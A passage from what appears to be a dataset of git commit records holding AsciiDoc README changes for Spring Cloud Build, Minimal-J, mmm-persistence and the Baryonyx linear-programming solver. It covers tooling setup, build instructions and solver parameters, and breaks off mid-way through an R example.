be longer), then it's enough for you to define a file under `${project.root}\/src\/checkstyle\/checkstyle-suppressions.xml` with your suppressions. 
Example:\n\n.projectRoot\/src\/checkstyle\/checkstyle-suppressions.xml\n----\n<?xml version=\"1.0\"?>\n<!DOCTYPE suppressions PUBLIC\n\t\t\"-\/\/Puppy Crawl\/\/DTD Suppressions 1.1\/\/EN\"\n\t\t\"https:\/\/www.puppycrawl.com\/dtds\/suppressions_1_1.dtd\">\n<suppressions>\n\t<suppress files=\".*ConfigServerApplication\\.java\" checks=\"HideUtilityClassConstructor\"\/>\n\t<suppress files=\".*ConfigClientWatch\\.java\" checks=\"LineLengthCheck\"\/>\n<\/suppressions>\n----\n\nIt's advisable to copy the `${spring-cloud-build.rootFolder}\/.editorconfig` and `${spring-cloud-build.rootFolder}\/.springformat` to your project. That way, some default formatting rules will be applied. You can do so by running this script:\n\n```bash\n$ curl https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/.editorconfig -o .editorconfig\n$ touch .springformat\n```\n\n=== IDE setup\n\n==== Intellij IDEA\n\nIn order to set up Intellij, you should import our coding conventions and inspection profiles and set up the checkstyle plugin.\nThe following files can be found in the https:\/\/github.com\/spring-cloud\/spring-cloud-build\/tree\/master\/spring-cloud-build-tools[Spring Cloud Build] project.\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle.xml <1>\n \u00a0\u00a0 \u2514\u2500\u2500 intellij\n \u00a0\u00a0 \u00a0\u00a0 \u251c\u2500\u2500 Intellij_Project_Defaults.xml <4>\n \u00a0\u00a0 \u00a0\u00a0 \u2514\u2500\u2500 Intellij_Spring_Boot_Java_Conventions.xml <5>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n<4> Project defaults for Intellij that apply most of the Checkstyle rules\n<5> Project style conventions for Intellij that apply most of the Checkstyle rules\n\n.Code style\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-code-style.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Code style`. There, click on the icon next to the `Scheme` section. There, click on the `Import Scheme` value and pick the `Intellij IDEA code style XML` option. Import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Spring_Boot_Java_Conventions.xml` file.\n\n.Inspection profiles\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-inspections.png[Inspection profiles]\n\nGo to `File` -> `Settings` -> `Editor` -> `Inspections`. There, click on the icon next to the `Profile` section. There, click on `Import Profile` and import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Project_Defaults.xml` file.\n\n.Checkstyle\n\nTo have Intellij work with Checkstyle, you have to install the `Checkstyle` plugin. It's advisable to also install the `Assertions2Assertj` plugin to automatically convert the JUnit assertions.\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-checkstyle.png[Checkstyle]\n\nGo to `File` -> `Settings` -> `Other settings` -> `Checkstyle`. 
There, click on the `+` icon in the `Configuration file` section. There, you'll have to define where the checkstyle rules should be picked from. In the image above, we've picked the rules from the cloned Spring Cloud Build repository. However, you can point to the Spring Cloud Build's GitHub repository (e.g. for `checkstyle.xml`: `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle.xml`). We need to provide the following variables:\n\n- `checkstyle.header.file` - please point it to Spring Cloud Build's `spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` URL.\n- `checkstyle.suppressions.file` - default suppressions. Please point it to Spring Cloud Build's `spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` URL.\n- `checkstyle.additional.suppressions.file` - this variable corresponds to suppressions in your local project. E.g. if you're working on `spring-cloud-contract`, then point to the `project-root\/src\/checkstyle\/checkstyle-suppressions.xml` file. An example for `spring-cloud-contract` would be: `\/home\/username\/spring-cloud-contract\/src\/checkstyle\/checkstyle-suppressions.xml`.\n\nIMPORTANT: Remember to set the `Scan Scope` to `All sources` since we apply checkstyle rules for production and test sources.\n\n=== Duplicate Finder\n\nSpring Cloud Build brings along the `basepom:duplicate-finder-maven-plugin`, which enables flagging duplicate and conflicting classes and resources on the Java classpath.\n\n==== Duplicate Finder configuration\n\nDuplicate finder is *enabled by default* and will run in the `verify` phase of your Maven build, but it will only take effect in your project if you add the `duplicate-finder-maven-plugin` to the `build` section of the project's `pom.xml`.\n\n.pom.xml\n[source,xml]\n----\n<build>\n <plugins>\n <plugin>\n <groupId>org.basepom.maven<\/groupId>\n <artifactId>duplicate-finder-maven-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\nFor other properties, we have set defaults as listed in the https:\/\/github.com\/basepom\/duplicate-finder-maven-plugin\/wiki[plugin documentation].\n\nYou can easily override them by setting the value of the selected property prefixed with `duplicate-finder-maven-plugin`. 
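As a sketch in `pom.xml` properties form (the skip flag is one such override, named in the text that follows):\n\n[source,xml]\n----\n<properties>\n    <!-- illustrative override: disables the duplicate check for this build -->\n    <duplicate-finder-maven-plugin.skip>true<\/duplicate-finder-maven-plugin.skip>\n<\/properties>\n----\n\n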
That is, setting `duplicate-finder-maven-plugin.skip` to `true` skips the duplicates check in your build.\n\nIf you need to add `ignoredClassPatterns` or `ignoredResourcePatterns` to your setup, make sure to add them in the plugin configuration section of your project:\n\n[source,xml]\n----\n<build>\n <plugins>\n <plugin>\n <groupId>org.basepom.maven<\/groupId>\n <artifactId>duplicate-finder-maven-plugin<\/artifactId>\n <configuration>\n <ignoredClassPatterns>\n <ignoredClassPattern>org.joda.time.base.BaseDateTime<\/ignoredClassPattern>\n <ignoredClassPattern>.*module-info<\/ignoredClassPattern>\n <\/ignoredClassPatterns>\n <ignoredResourcePatterns>\n <ignoredResourcePattern>changelog.txt<\/ignoredResourcePattern>\n <\/ignoredResourcePatterns>\n <\/configuration>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9a20039e08d1656042d8554b4294a878aa50ef07","subject":"README.adoc: removed 'status' section. Doesn't help in any way","message":"README.adoc: removed 'status' section. Doesn't help in any way","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Minimal-J\n\nJava - but small.\n\nimage::doc\/frontends.png[]\n\nMinimal-J applications are\n\n* Responsive to use on every device\n* Straightforward to specify and implement and therefore\n* Easy to plan and manage\n\n=== Idea\n\nBusiness applications tend to get complex and complicated. Minimal-J prevents this by setting clear rules for how an application should behave and how it should be implemented.\n\nMinimal applications may not always look the same. But the UI concepts never change. There are no surprises for the user.\n\n== Technical Features\n\n* Independent of the UI technology used. Implementations for Web \/ Mobile \/ Desktop.\n* ORM persistence layer for Maria DB or in-memory DB. Transactions and Authorization supported.\n* Small: The minimalj.jar is still < 1MB\n* Very few dependencies\n* Applications run standalone or in a servlet container.\n\n== Documentation\n\n* link:doc\/user_guide.adoc[Minimal user guide] Good starting point for users and programmers.\n* link:doc\/setup.adoc[Setup]\n* link:doc\/release_notes.adoc[Release Notes]\n\n=== Topics and examples\n\nThe small examples are currently deployed on CloudFoundry as online demo. 
Please note that some features are still incomplete in the html frontend.\n\n* link:example\/001_EmptyApplication\/doc\/001.adoc[Empty Application] The smallest application link:http:\/\/minimalj-examples.cfapps.io\/empty\/[(online demo)]\n* link:example\/002_HelloWorld\/doc\/002.adoc[Hello World] The hello world and the greeting application link:http:\/\/minimalj-examples.cfapps.io\/greeting\/[(online demo)]\n* link:example\/003_Notes\/doc\/003.adoc[Notes] This application manages some notes link:http:\/\/minimalj-examples.cfapps.io\/notes\/[(online demo)]\n* link:example\/004_Library\/doc\/004.adoc[Library] Shows some more features of the framework link:http:\/\/minimalj-examples.cfapps.io\/library\/[(online demo)]\n* link:example\/005_Numbers\/doc\/005.adoc[Numbers] How integers and BigDecimals are used\nlink:http:\/\/minimalj-examples.cfapps.io\/numbers\/[(online demo)]\n* link:example\/006_Persistence\/doc\/006.adoc[Persistence] Introduction to the O\/R mapping\n* link:example\/007_PetClinic\/doc\/007.adoc[PetClinic] Cover version of the Spring PetClinic application link:http:\/\/minimalj-examples.cfapps.io\/petClinic\/[(online demo)]\n* link:doc\/arch.adoc[Architecture] Explains the difference between client\/server and frontend\/backend\n* link:doc\/lists.adoc[Lists] How to use one to many relations in the data model\n* link:doc\/ui_content_and_components.adoc[UI details] Content, components and forms\n* link:doc\/authorization.adoc[Authorization] Security concepts and configuration\n\n=== Real application\n* https:\/\/github.com\/BrunoEberhard\/open-ech[Open-eCH]\n","old_contents":"= Minimal-J\n\nJava - but small.\n\nimage::doc\/frontends.png[]\n\nMinimal-J applications are\n\n* Responsive to use on every device\n* Straightforward to specify and implement and therefore\n* Easy to plan and manage\n\n=== Idea\n\nBusiness applications tend to get complex and complicated. Minimal-J prevents this by setting clear rules for how an application should behave and how it should be implemented.\n\nMinimal applications may not always look the same. But the UI concepts never change. There are no surprises for the user.\n\n== Technical Features\n\n* Independent of the UI technology used. Implementations for Web \/ Mobile \/ Desktop.\n* ORM persistence layer for Maria DB or in-memory DB. Transactions and Authorization supported.\n* Small: The minimalj.jar is still < 1MB\n* Very few dependencies\n* Applications run standalone or in a servlet container.\n\n== Status\n\nSometimes when I look at other frameworks, I think Minimal-J is quite mature.\nBut at the moment it is still more of a personal research project. I still\nfeel free to change major points. There is no 1.0 version yet.\n\n== Documentation\n\nlink:doc\/user_guide.adoc[Minimal user guide] Good starting point for users and programmers.\n\nlink:doc\/setup.adoc[Setup]\n\nlink:doc\/release_notes.adoc[Release Notes]\n\n=== Topics and examples\n\nThe small examples are currently deployed on CloudFoundry as online demo. 
Please note that some features are still incomplete in the html frontend.\n\n* link:example\/001_EmptyApplication\/doc\/001.adoc[Empty Application] The smallest application link:http:\/\/minimalj-examples.cfapps.io\/empty\/[(online demo)]\n* link:example\/002_HelloWorld\/doc\/002.adoc[Hello World] The hello world and the greeting application link:http:\/\/minimalj-examples.cfapps.io\/greeting\/[(online demo)]\n* link:example\/003_Notes\/doc\/003.adoc[Notes] This application manages some notes link:http:\/\/minimalj-examples.cfapps.io\/notes\/[(online demo)]\n* link:example\/004_Library\/doc\/004.adoc[Library] Shows some more features of the framework link:http:\/\/minimalj-examples.cfapps.io\/library\/[(online demo)]\n* link:example\/005_Numbers\/doc\/005.adoc[Numbers] How integers and BigDecimals are used\nlink:http:\/\/minimalj-examples.cfapps.io\/numbers\/[(online demo)]\n* link:example\/006_Persistence\/doc\/006.adoc[Persistence] Introduction to the O\/R mapping\n* link:example\/007_PetClinic\/doc\/007.adoc[PetClinic] Cover version of the Spring PetClinic application link:http:\/\/minimalj-examples.cfapps.io\/petClinic\/[(online demo)]\n* link:doc\/arch.adoc[Architecture] Explains the difference between client\/server and frontend\/backend\n* link:doc\/lists.adoc[Lists] How to use one to many relations in the data model\n* link:doc\/ui_content_and_components.adoc[UI details] Content, components and forms\n* link:doc\/authorization.adoc[Authorization] Security concepts and configuration\n\n=== Real application\n* https:\/\/github.com\/BrunoEberhard\/open-ech[Open-eCH]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c580896805165b18fa4a45d899ef452a005b2889","subject":"README improved","message":"README improved\n","repos":"m-m-m\/persistence","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Mature Modular Meta-framework (mmm)\n\nimage:https:\/\/raw.github.com\/m-m-m\/mmm\/master\/src\/site\/resources\/images\/logo.png[logo]\n\n*Welcome to the wonderful world of http:\/\/m-m-m.sourceforge.net\/index.html[mmm]*\n\n== mmm-persistence\n\nPersistence infrastructure for DAOs based on JPA\n\n=== Deprecated\nThis project is discontinued and not supported anymore.\nPlease consider using http:\/\/projects.spring.io\/spring-data-jpa\/[spring-data-jpa] or https:\/\/github.com\/oasp\/oasp4j\/tree\/develop\/modules\/jpa[oasp4j-module-jpa] instead.","old_contents":"= mmm-persistence\nPersistence infrastructure for DAOs based on JPA\n\n== Deprecated\nThis project is discontinued and not supported anymore.\nPlease consider using http:\/\/projects.spring.io\/spring-data-jpa\/[spring-data-jpa] or https:\/\/github.com\/oasp\/oasp4j\/tree\/develop\/modules\/jpa[oasp4j-module-jpa] instead.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e6489f9b7dda9f992085c161dfd5aa41f5a90bfe","subject":"README: update with new parameters","message":"README: update with new parameters\n","repos":"quesnel\/baryonyx,quesnel\/baryonyx,quesnel\/baryonyx","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Baryonyx\nGauthier Quesnel <gauthier.quesnel@inra.fr>\nv0.5.x, 2020-01-??\n:toc:\n:homepage: https:\/\/github.com\/quesnel\/baryonyx\/\n\nhttps:\/\/en.wikipedia.org\/wiki\/Baryonyx[Baryonyx] is an integer and binary linear\nprogramming solver based on the http:\/\/www.cse.chalmers.se\/~dag\/[Dag Wedelin]\nheuristic.\n\n[width=\"15%\"]\n|============\n| 
https:\/\/travis-ci.org\/quesnel\/baryonyx[image:https:\/\/travis-ci.org\/quesnel\/baryonyx.png?branch=master[Build Status]] | https:\/\/ci.appveyor.com\/project\/quesnel\/baryonyx?branch=master[image:https:\/\/ci.appveyor.com\/api\/projects\/status\/github\/quesnel\/baryonyx?branch=master&svg=true[Build Status]]\n|============\n\nCopyright \u00a9 2017-2019 http:\/\/www.inra.fr\/en[INRA]\n\nThe software is released under the MIT license. See the LICENSE file.\n\n== Baryonyx\n\n=== Requirements and recommendations\n\n* `cmake` (\u2265 3.11)\n* $$C++$$ compiler with $$C++17$$ support:\n** `gcc` \u2265 7 (https:\/\/www.gnu.org\/software\/gcc\/projects\/cxx-status.html[notes])\n** `clang` \u2265 5 (https:\/\/clang.llvm.org\/cxx_status.html[notes])\n** `visual studio 2017 15.9` with the latest patches of 2018 (https:\/\/docs.microsoft.com\/en-us\/visualstudio\/releasenotes\/vs2017-relnotes[notes])\n\nFor recent Debian GNU\/Linux and Ubuntu derivatives (remove clang to\nonly use gcc):\n\n[source,bash]\n....\napt-get install build-essential cmake clang\n....\n\nFor Windows, install the https:\/\/www.cmake.org[CMake program] and\nVisual Studio 2017 (MSVC). You may also install the vcpkg program to\ninstall nlopt and other dependencies.\n\n* `nlopt` library - an optimization library used for automatic parametrization\n of the Baryonyx solver parameters.\n\n=== First installation\n\nFirst, we clone the Baryonyx Git repository and its submodules.\n\n....\ngit clone https:\/\/github.com\/quesnel\/baryonyx.git\ncd baryonyx\ngit submodule update --init --recursive\n....\n\nBy default, Baryonyx provides a shared library `libbaryonyx-0.5.so` (with\nhidden symbols), a static library `libbaryonyx-0.5.a` (all symbols are\npublic) and an executable `baryonyx-0.5`. To compile and install in\nthe default CMake install directory:\n\n....\ncd baryonyx\nmkdir build\ncd build\ncmake -DCMAKE_BUILD_TYPE=Release ..\nmake install\n....\n\nThe previous commands install the Baryonyx program and library into the\n`\/usr\/local` prefix. If you install into another directory, you need\nto define three environment variables (in your `.bashrc` or\nequivalent). If you install into `$HOME\/usr` for example, you need to\ndefine in your `.bashrc`:\n\n....\nexport PATH=$PATH:$HOME\/usr\/bin\nexport LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$HOME\/usr\/lib\nexport PKG_CONFIG_PATH=$PKG_CONFIG_PATH:$HOME\/usr\/lib\/pkgconfig\n....\n\nThen run the following commands:\n\n....\ncd baryonyx\nmkdir build\ncd build\ncmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=$HOME\/usr ..\nmake install\n....\n\nTo override the default build flags, remove the `CMAKE_BUILD_TYPE`\nparameter and override the `CXXFLAGS` as follows:\n\n....\nexport CXX=g++-8\nexport CXXFLAGS='-Wall -Wextra -Werror -ftree-vectorize -mmmx -msse -msse2 -msse3 -O3'\ncmake -DCMAKE_INSTALL_PREFIX=$HOME\/usr ..\n....\n\nThe CMake script provides parameters to control debugging, logging and\noptimization.\n\n.Table CMake Command line parameters (cmake -DWITH_LOG=OFF ...)\n[cols=\"1,1,5a\", options=\"header\"]\n|===\n|name| default| summary\n\n| WITH_LOG\n| ON\n| Enable log messages on standard output.\n\n| WITH_DEBUG\n| ON\n| Enable maximum debug functionality and add more log messages. 
=== Update installation\n\nFirst, we need to update the Git repository with the following\ncommands:\n\n....\ncd baryonyx\ngit pull -r\ngit submodule update --recursive\n....\n\nThen go to the build directory and restart the compilation and\ninstallation:\n\n....\ncd baryonyx\nmkdir build\ncd build\ncmake -DCMAKE_BUILD_TYPE=Release ..\nmake install\n....\n\n== Usage\n\n=== Solver & Optimizer\n\nTo run Baryonyx in solver mode (i.e. trying to validate all constraints):\n\n....\nbaryonyx-0.5 file.lp\n....\n\nTo run Baryonyx in heuristic mode (i.e. trying to validate all\nconstraints and optimize the solution), add a `-o` or `--optimize`\noption to the command line:\n\n....\nbaryonyx-0.5 -o file.lp\n....\n\nThe Baryonyx solver has many parameters. Some parameters are global,\nsome are specific to the optimization algorithms.\n\n.Table Command line global parameters\n[cols=\"1,1,5a\", options=\"header\"]\n|===\n|name| type| summary\n\n| --help -h\n|\n| Show help message\n\n| --quiet -q\n|\n| Reduce console output\n\n| --bench [name]\n|\n| Start benchmark. Needs csv input files\n\n| --optimize -O\n|\n| Start Baryonyx in optimization mode, default is to use the solve mode\n\n| --limit -l -plimit\n| integer\n| number of loops before the algorithm stops\n\n| --verbose -v\n| integer\n| verbose level from 0 (very very verbose in debug mode) to 7 (quiet)\n\n| --disable-preprocessing -np\n|\n| disable the use of preprocessing\n\n| --random\n|\n| use the pure random solver (for benchmark) instead of the Bastert\/Wedelin algorithm.\n\n| --auto[:= ]value\n| string\n| Select the type of optimizer meta-heuristic. Values are:\n\n* `none` without specific algorithm.\n* `manual` tries to update parameters to find the best solution.\n* `nlopt` tries to update parameters to find the best solution using the nlopt library and the Nelder-Mead algorithm.\n* `branch` recursively splits the original problem to find the best solution.\n* `branch-manual` mixes the branch and manual algorithms.\n* `branch-nlopt` mixes the branch and nlopt algorithms.\n\n|===\n\n
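For example, to run the optimizer with the `branch` meta-heuristic (here `file.lp` stands for any model file):\n\n....\nbaryonyx-0.5 -O --auto:branch file.lp\n....\n\n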
To assign parameters to solver or optimizer algorithms, use the `-p\n[name]:value` syntax in the command line:\n\n.Table Command line parameters\n[cols=\"1,1,5a\", options=\"header\"]\n|===\n|name| type| summary\n\n| time-limit\n| real\n| time in seconds to stop the algorithm or the optimize mode\n\n| limit\n| integer\n| number of loops before the algorithm stops\n\n| w\n| double\n| warmup-iterator [0, 1] A percentage of the `limit` loops; if w is greater than 1, the number of loops without updating kappa\n\n| theta\n| real\n| history parameter [0, 1[\n\n| delta\n| real\n| influence parameter [0, +oo[\n\n| kappa-min\n| real\n| kappa minimal value [0, kappa-max[\n\n| kappa-step\n| real\n| kappa updater [0, +oo[\n\n| kappa-max\n| real\n| kappa maximal value ]kappa-min, +oo[ to stop the algorithm\n\n| alpha\n| real\n| adaptiveness parameter\n\n| pushing-k-factor\n| real\n| used to lower kappa using the push system\n\n| pushes-limit\n| integer\n| number of pushes before stopping the algorithm\n\n| pushing-objective-amplifier\n| real\n| used to make r more similar to costs\n\n| pushing-iteration-limit\n| integer\n| number of loops before trying a new push\n\n| norm\n| string\n| Select the cost normalization function\n\n* `none` leaves costs unmodified\n* `l1` use the l1-norm function\n* `l2` use the l2-norm function\n* `random` tries to avoid equal costs\n* `inf` (default): use the infinity norm\n\n| constraint-order\n| string\n| Remaining constraints order. Values are:\n\n* `none` (default): use the lp format constraint order\n* `reversing`: reverse the lp format constraint order\n* `random-sorting`: randomize the remaining constraint list\n* `infeasibility-decr`: compute constraint infeasibility in decremental order\n* `infeasibility-incr`: compute constraint infeasibility in incremental order\n* `lagrangian-decr`: sort violated constraints according to the Lagrangian multiplier values in decremental order\n* `lagrangian-incr`: sort violated constraints according to the Lagrangian multiplier values in incremental order\n* `pi-sign-change`: randomize the remaining constraint list if the Lagrangian multipliers' signs have changed\n* `cycle`: switch the constraint order after each `update_row`. Cycles from `none` to `pi-sign-change`.\n\n| preprocessing\n| string\n| Constraints matrix A order.
Values are:\n\n* `none`: Use the raw_problem (or lp file) order for constraints and variables.\n* `memory`: Default, use the raw_problem (or lp file) order for constraints but sort the variables to improve the memory cache efficiency.\n* `less_greater_equal`: sort constraints according to their type (first less then greater and finally equal) and sort variables to improve the memory cache efficiency.\n* `less_equal_greater`: sort constraints according to their type (first less\n then equal and finally greater) and sort variables to improve the memory cache\n efficiency.\n* `greater_less_equal`: sort constraints according to their type (first greater\n then less and finally equal) and sort variables to improve the memory cache\n efficiency.\n* `greater_equal_less`: sort constraints according to their type (first greater\n then equal and finally less) and sort variables to improve the memory cache\n efficiency.\n* `equal_less_greater`: sort constraints according to their type (first equal\n then less and finally greater) and sort variables to improve the memory cache\n efficiency.\n* `equal_greater_less`: sort constraints according to their type (first equal\n then greater and finally less) and sort variables to improve the memory cache\n efficiency.\n* `p1`: reserved\n* `p2`: reserved\n* `p3`: reserved\n* `p4`: reserved\n\n| observation\n| string\n| Select the type of observation mechanism (only in solve mode)\n\n* `none` no observation (default).\n* `pnm` produces picture files for the P matrix (one per loop) and the Pi vector (Lagrangian multipliers) each loop\n* `file` produces CSV files for the P matrix (one per loop) and the Pi vector (Lagrangian multipliers) each loop\n\n| floating-point_type\n| string\n| Select the type of real used internally in the solvers. Values are:\n\n* `float` float (32 bits)\n* `double` double (64 bits)\n* `longdouble` long double (80 or 128 bits)\n\n| print-level\n| integer\n| show information if greater than 0\n\n| init-policy (solver only)\n| string\n| Change the initialization and reinitialization policy of the solution vector. Values are:\n\n* `bastert`: for each variable (or at the `init-policy-random` rate) use cost\n values to set or unset the variable.\n* `pessimistic-solve`: find a solution for each constraint (or at the `init-policy-random`\n rate). For soft constraints, assign one to the strict minimum of\n variables.\n* `optimistic-solve`: find a solution for each constraint (or at the `init-policy-random`\n rate). For soft constraints, assign one to the maximum number of variables\n that validate the constraint.\n\n| init-policy-random (solver only)\n| real\n| [0-1] (default, 0.5) parameter of the Bernoulli law to be used in\n conjunction with the `init-policy` parameter. If the law returns 1, it\n uses the `init-policy` algorithm to initialize `X_i`, 0 means use a toss\n up to choose 0 or 1 according to the `init-random` value.\n\n| init-crossover-bastert-insertion (optimizer only)\n| real\n| [0-1] Probability to insert a bastert solution during the crossover\n operation.\n\n| init-crossover-solution-selection-mean (optimizer only)\n| real\n| [0-1] Probability to select a solution to do the crossover operation. This\n parameter allows the selection of a solution in the population. 0 means best\n solution, 1 means the worst in mean.\n\n| init-crossover-solution-selection-stddev (optimizer only)\n| real\n| [0-1] Probability to select a solution to do the crossover operation. This\n parameter allows the selection of a solution in the population.
The standard\n deviation for the normal probability law.\n\n| init-mutation-variable-mean (optimizer only)\n| real\n| [0-1] Probability to mutate the solution after the crossover operation. This\n parameter defines the number of variables to change. The mean for the normal\n probability law.\n\n| init-mutation-variable-stddev (optimizer only)\n| real\n| [0-1] Probability to mutate the solution after the crossover operation. This\n parameter defines the number of variables to change. The standard deviation\n for the normal probability law.\n\n| init-mutation-value-mean (optimizer only)\n| real\n| [0-1] Probability to mutate the solution after the crossover operation. This\n parameter defines the value of the variable. The mean for the normal\n probability law.\n\n| init-mutation-value-stddev (optimizer only)\n| real\n| [0-1] Probability to mutate the solution after the crossover operation. This\n parameter defines the value of the variable. The standard deviation for the\n normal probability law.\n\n| storage-type\n| string\n| Change the solution storage policy for the optimizer mode.\n\n* `one` (default): stores only the best solution found.\n* `bound`: stores the best and the worst solutions found.\n* `five`: stores the five best solutions found.\n\n|===\n\nFor example:\n\n....\nbaryonyx -p limit:1000000 lib\/test\/prevl1.lp\nbaryonyx -p limit:-1 -p kappa-min:0.2 lib\/test\/prevl1.lp\n....\n\n
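In optimization mode, solver parameters combine in the same way; a sketch (`file.lp` stands for any model file):\n\n....\nbaryonyx -O -p time-limit:60 -p storage-type:five file.lp\n....\n\n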
=== Benchmark\n\nBaryonyx can run benchmarks on a set of problems described in `csv`\nfiles. This option is available using the `--bench [name]` option and `csv`\nfiles. All Baryonyx parameters are available to perform the benchmark.\n\nFor example:\n\n....\nbaryonyx --bench bx-0.5 -pdelta:0.01 -ptime-limit:60 spp.csv\n....\n\nThe benchmark mode updates the `csv` file with results of computation. The\n`csv` format is:\n\n....\nfile optimum status cplex lsp bx-0.2 <1>\ncplex:\nlsp: <2>\nbx-0.2:\nscp410 optimum 514 514 514 804 <3>\nscp41 optimum 429 429 429 627\nscp42 optimum 512 512 512 934\n....\n\n<1> The header: three mandatory columns (`file`, `optimum`, `status`) and one\nsolver per column. In this example, cplex, local solver and baryonyx 0.2.\n<2> The description part: one line per solver to describe the version and parameters,\nfor example.\n<3> Finally, one line per solve: model name (with or without extension), status\n(optimum\/feasible), best solution found and solver's solution. `inf` can be used\nto indicate no solution found.\n\nIn the benchmark directory, some files are provided, along with a script to download\nclassical problems.\n\n== R\n\nTo use rbaryonyx, you must compile and install the baryonyx library.\nFollow the previous section and install R.\n\n=== Installation\n\nThe R rbaryonyx package requires several packages. Then, under an R terminal:\n\n....\ncd baryonyx\/rbaryonyx\nR CMD REMOVE rbaryonyx <1>\n\ninstall.packages(\"roxygen2\") <2>\ninstall.packages(\"Rcpp\")\ninstall.packages(\"devtools\")\n\nlibrary(Rcpp) <3>\ncompileAttributes(\".\")\nlibrary(devtools)\ndevtools::document()\ndevtools::build()\ndevtools::install()\n\nlibrary(rbaryonyx) <4>\n?rbaryonyx <5>\n....\n\n<1> Remove the previously installed version of rbaryonyx\n<2> Install the dependencies of rbaryonyx\n<3> Build the rbaryonyx package\n<4> Load the package\n<5> The help\n\n=== API\n\nTwo functions are provided to solve or optimize 01 linear programming\nproblems. Parameters are the same as in the `C++ API`. These functions return a\nscalar:\n\n* If a solution is found:\n** if the problem is a minimization: the value of the solution found.\n** if the problem is a maximization: the inverse of the solution found.\n* If no solution is found, we use the limits of the objective function (minimal\n and maximal values possible).\n** if the problem is a minimization: the maximal value possible + the remaining\n constraints.\n** if the problem is a maximization: the inverse of the minimal value possible\n + the remaining constraints.\n* If an error occurred (not enough memory, problem error etc.):\n** if the problem is a minimization: the maximal value possible + the number of\n constraints.\n** if the problem is a maximization: the inverse of the minimal value possible\n + the number of constraints.\n\n[source,R]\n----\nsolve_01lp_problem <- function(file_path, limit = 1000L, theta = 0.5,\n delta = 1e-4, constraint_order = 0L, kappa_min = 0.1, kappa_step = 1e-4,\n kappa_max = 1.0, alpha = 1.0, w = 500L, time_limit = 10.0, seed = -1L,\n thread = 1L, norm = 4L, pushing_k_factor = 0.9,\n pushing_objective_amplifier = 5.0, pushes_limit = 10L,\n pushing_iteration_limit = 20L, init_policy = 0L, init_random = 0.5,\n float_type = 1L, verbose = TRUE)\n\noptimize_01lp_problem <- function(file_path, limit = 1000L, theta = 0.5,\n delta = 1e-4, constraint_order = 0L, kappa_min = 0.1, kappa_step = 1e-4,\n kappa_max = 1.0, alpha = 1.0, w = 500L, time_limit = 10.0, seed = -1L,\n thread = 1L, norm = 4L, pushing_k_factor = 0.9,\n pushing_objective_amplifier = 5.0, pushes_limit = 10L,\n pushing_iteration_limit = 20L, init_policy = 0L, init_random = 0.5,\n float_type = 1L, verbose = TRUE)\n----\n\n=== Usage\n\nApply the Morris method to find useful parameters:\n\n[source,R]\n----\nlibrary(rbaryonyx)\nlibrary(sensitivity)\n\n# one name per row of the bounds table below\nfactors = c(\"theta\", \"delta\", \"constraint_order\", \"kappa_min\", \"kappa_step\",\n \"kappa_max\", \"alpha\", \"w\", \"norm\", \"pushing_k_factor\",\n \"pushing_objective_amplifier\", \"pushes_limit\", \"pushing_iteration_limit\",\n \"init_policy\", \"init_random\", \"float_type\")\n\nbounds = data.frame(\n min=c(\n 0, # theta\n 0, # delta\n 0, # constraint_order\n 0, # kappa_min\n 1e-16, # kappa_step\n 1.0, # kappa_max\n 0.0, # alpha\n 50, # w\n 0, # norm\n 0.1, # pushing_k_factor\n 1.0, # pushing_objective_amplifier\n 10, # pushes_limit\n 20, # pushing_iteration_limit\n 0, # init_policy\n 0.0, # init_random\n 0\n ), # float_type\nmax=c(\n 1, # theta\n 0, # delta\n 4, # constraint_order\n 0.1, # kappa_min\n 1e-1, # kappa_step\n 1.0, # kappa_max\n 2.0, # alpha\n 500, # w\n 4, # norm\n 1, # pushing_k_factor\n 10.0, # pushing_objective_amplifier\n 100, # pushes_limit\n 200, # pushing_iteration_limit\n 2, # init_policy\n 1.0, # init_random\n 2)) # float_type\n\nrownames(bounds) <- factors\n\nmorrisDesign <- morris(model = NULL,\n factors = factors,\n r = 10,\n design=list(type=\"oat\", levels=10, 